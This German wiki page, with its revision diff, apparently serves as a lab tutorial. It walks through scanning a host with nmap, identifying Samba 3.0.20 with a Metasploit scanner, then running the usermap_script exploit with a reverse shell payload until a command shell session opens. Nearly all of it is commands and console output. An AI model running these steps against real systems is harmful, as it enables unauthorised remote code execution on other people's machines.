Metasploit Exploit und Payload (Samba): Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(43 dazwischenliegende Versionen von 2 Benutzern werden nicht angezeigt)
Zeile 1: Zeile 1:
 
=Schwachstelle suchen=
 
=Schwachstelle suchen=
*Mittels nmap einen Port suchen. In diesem Fall Samba.
+
==Mittels nmap einen Port suchen. In diesem Fall Samba==
*'''Befehl:''' root@kali:~# nmap -sV 10.82.1.101
+
*nmap -sV 10.0.10.105 -p 445
 +
...
 +
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 +
 
 +
=Genaue Version=
 +
;Durch nmap kann die genaue Version von Samba nicht gesehen werden.  
 +
;Deshalb wird ein Modul von Metasploit benötigt.
 +
 
 +
=msfconsole starten=
 +
*msfconsole
 +
;Ab hier geht es in der msfconsole weiter
 +
*msf6 > use auxiliary/scanner/smb/smb_version
 +
;Nun wird noch die RHOSTS (Die IP des Opfers) benötigt:
 +
*msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.0.10.105
 +
;Durch den Befehl '''show options''' werden die momentanen Einstellung gezeigt:
 +
*msf6 auxiliary(scanner/smb/smb_version) > show options
 +
;Durch das absetzen von dem Befehl '''run''' kann nun die genaue Samba Version ermittelt werden
 +
*msf6 auxiliary(scanner/smb/smb_version) > run
 +
[*] 10.0.10.105:445      -   Host could not be identified: Unix (Samba 3.0.20-Debian)
 +
 
 +
=Passendes Module suchen=
 +
;Um nach Modulen zu suchen die wir nun für diese Version nutzen können muss folgender Befehl abgesetzt werden:
 +
*search Samba 3.0.20
 
<pre>
 
<pre>
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-02 12:48 CET </pre>
+
Matching Modules
Nmap scan report for 10.82.1.101
+
================
  Host is up (0.00015s latency).
+
 
Not shown: 977 closed ports
+
  #  Name                                Disclosure Date  Rank      Check  Description
PORT    STATE SERVICE    VERSION
+
  -  ----                                ---------------  ----      ----- -----------
21/tcp  open  ftp        vsftpd 2.3.4
+
  0  exploit/multi/samba/usermap_script  2007-05-14      excellent  No    Samba "username map script" Command Execution
  22/tcp  open  ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
+
 
23/tcp  open  telnet      Linux telnetd
+
 
  25/tcp  open smtp        Postfix smtpd
+
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
  53/tcp  open domain      ISC BIND 9.4.2
+
</pre>
  80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
+
 
  111/tcp  open rpcbind
+
 
  <b>139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
+
=Laden das Modul=
  445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</b>
+
*use exploit/multi/samba/usermap_script
  512/tcp  open  exec        netkit-rsh rexecd
+
;Und mittels des Befehls '''info''' kann eine genaue Beschreibung des Modules eingesehen werden.
513/tcp  open  login
+
;Anhand der Beschreibung durch '''info''' kann erkannt werden, dass dieses Module zu unserer Version passt und wir hiermit Befehle auf dem Opfer ausführen können.
  514/tcp  open  tcpwrapped
+
 
  1099/tcp open  java-rmi   GNU Classpath grmiregistry
+
=Konfiguration des Samba Modules=
1524/tcp open  bindshell  Metasploitable root shell
+
*Für das Module muss wieder der '''RHOST''' und ein '''PAYLOAD''' eingetragen werden.
2049/tcp open  rpcbind
+
===RHOST===
2121/tcp open  ftp        ProFTPD 1.3.1
+
*msf6 exploit(multi/samba/usermap_script) > set RHOST 10.0.10.105
3306/tcp open  mysql      MySQL 5.0.51a-3ubuntu5
+
  RHOST => 10.0.10.105
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
+
 
5900/tcp open  vnc        VNC (protocol 3.3)
+
===PAYLOAD===
6000/tcp open  X11        (access denied)
+
*msf6 exploit(multi/samba/usermap_script) > set PAYLOAD cmd/unix/reverse
6667/tcp open  irc        UnrealIRCd
+
  PAYLOAD => cmd/unix/reverse
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
+
;Mit '''show options''' kann die momentane Konfiguration
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
+
*msf6 exploit(multi/samba/usermap_script) > show options
 +
<pre>
 +
Module options (exploit/multi/samba/usermap_script):
 +
 
 +
  Name    Current Setting Required Description
 +
  ----    --------------- -------- -----------
 +
  RHOSTS 10.0.10.105      yes      The target host(s), range CIDR identifier, or hosts file with syn
 +
                                      tax 'file:<path>'
 +
  RPORT  139              yes      The target port (TCP)
 +
 
 +
 
 +
Payload options (cmd/unix/reverse):
 +
 
 +
  Name  Current Setting Required Description
 +
  ----  --------------- -------- -----------
 +
  LHOST 10.0.10.101      yes      The listen address (an interface may be specified)
 +
  LPORT 4444            yes      The listen port
 +
 
 +
 
 +
Exploit target:
 +
 
 +
  Id Name
 +
  -- ----
 +
   0  Automatic
 +
</pre>
 +
=Exploit ausführen=
 +
*msf6 exploit(multi/samba/usermap_script) > exploit
 +
<pre>
 +
[*] Started reverse TCP double handler on 10.0.10.101:4444
 +
[*] Accepted the first client connection...
 +
[*] Accepted the second client connection...
 +
[*] Command: echo jEJ39DSiCoeqjn4t;
 +
[*] Writing to socket A
 +
[*] Writing to socket B
 +
[*] Reading from sockets...
 +
[*] Reading from socket B
 +
[*] B: "jEJ39DSiCoeqjn4t\r\n"
 +
[*] Matching...
 +
[*] A is input...
 +
[*] Command shell session 1 opened (10.0.10.101:4444 -> 10.0.10.105:39012) at 2021-06-30 17:32:28 +0200
 +
</pre>
 +
;Wir haben kein Prompt aber eine Shell

Aktuelle Version vom 28. Juli 2021, 12:15 Uhr

Schwachstelle suchen

Mittels nmap einen Port suchen. In diesem Fall Samba

  • nmap -sV 10.0.10.105 -p 445
...
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Genaue Version

Durch nmap kann die genaue Version von Samba nicht gesehen werden.
Deshalb wird ein Modul von Metasploit benötigt.

msfconsole starten

  • msfconsole
Ab hier geht es in der msfconsole weiter
  • msf6 > use auxiliary/scanner/smb/smb_version
Nun wird noch die RHOSTS (Die IP des Opfers) benötigt
  • msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.0.10.105
Durch den Befehl show options werden die momentanen Einstellung gezeigt
  • msf6 auxiliary(scanner/smb/smb_version) > show options
Durch das absetzen von dem Befehl run kann nun die genaue Samba Version ermittelt werden
  • msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.0.10.105:445       -   Host could not be identified: Unix (Samba 3.0.20-Debian)

Passendes Module suchen

Um nach Modulen zu suchen die wir nun für diese Version nutzen können muss folgender Befehl abgesetzt werden
  • search Samba 3.0.20
Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script


Laden das Modul

  • use exploit/multi/samba/usermap_script
Und mittels des Befehls info kann eine genaue Beschreibung des Modules eingesehen werden.
Anhand der Beschreibung durch info kann erkannt werden, dass dieses Module zu unserer Version passt und wir hiermit Befehle auf dem Opfer ausführen können.

Konfiguration des Samba Modules

  • Für das Module muss wieder der RHOST und ein PAYLOAD eingetragen werden.

RHOST

  • msf6 exploit(multi/samba/usermap_script) > set RHOST 10.0.10.105
RHOST => 10.0.10.105

PAYLOAD

  • msf6 exploit(multi/samba/usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
Mit show options kann die momentane Konfiguration
  • msf6 exploit(multi/samba/usermap_script) > show options
 
Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.0.10.105      yes       The target host(s), range CIDR identifier, or hosts file with syn
                                      tax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.10.101      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Exploit ausführen

  • msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 10.0.10.101:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo jEJ39DSiCoeqjn4t;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "jEJ39DSiCoeqjn4t\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.0.10.101:4444 -> 10.0.10.105:39012) at 2021-06-30 17:32:28 +0200
Wir haben kein Prompt aber eine Shell
Abgerufen von „http://wiki.ixheim.de/index.php?title=Metasploit_Exploit_und_Payload_(Samba)&oldid=26272